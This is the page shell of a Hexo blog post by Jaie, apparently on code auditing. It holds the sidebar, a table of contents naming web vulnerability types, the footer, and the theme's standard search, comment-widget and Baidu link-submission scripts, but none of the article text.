    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://jaie-1256725437.cos.ap-guangzhou.myqcloud.com/pic/20190424201847.png" alt="Jaie">
            
              <p class="site-author-name" itemprop="name">Jaie</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">36</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/Tags/index.html">
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/rss2.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Jaie0801" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="jaie0801@outlook.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.zhihu.com/people/jay-73-89" target="_blank" title="知乎">
                      
                        <i class="fa fa-fw fa-gratipay"></i>知乎</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://weibo.com/2130700007" target="_blank" title="微博">
                      
                        <i class="fa fa-fw fa-weibo"></i>微博</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#一-代码审计"><span class="nav-number">1.</span> <span class="nav-text">一.代码审计</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-审计工具选择"><span class="nav-number">1.1.</span> <span class="nav-text">1.审计工具选择</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-审计思路"><span class="nav-number">1.2.</span> <span class="nav-text">2.审计思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二-漏洞审计"><span class="nav-number">1.3.</span> <span class="nav-text">二.漏洞审计</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-SQL注入"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">1.  SQL注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-XSS漏洞"><span class="nav-number">1.3.0.2.</span> <span class="nav-text">2.  XSS漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-文件包含"><span class="nav-number">1.3.0.3.</span> <span class="nav-text">3.  文件包含</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-文件上传"><span class="nav-number">1.3.0.4.</span> <span class="nav-text">4 .  文件上传</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-命令执行"><span class="nav-number">1.3.0.5.</span> <span class="nav-text">5.  命令执行</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-其他的一些漏洞"><span class="nav-number">1.3.0.6.</span> <span class="nav-text">6.  其他的一些漏洞</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jaie</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">25.1k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>



  
  

  

  

  

</body>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</html>
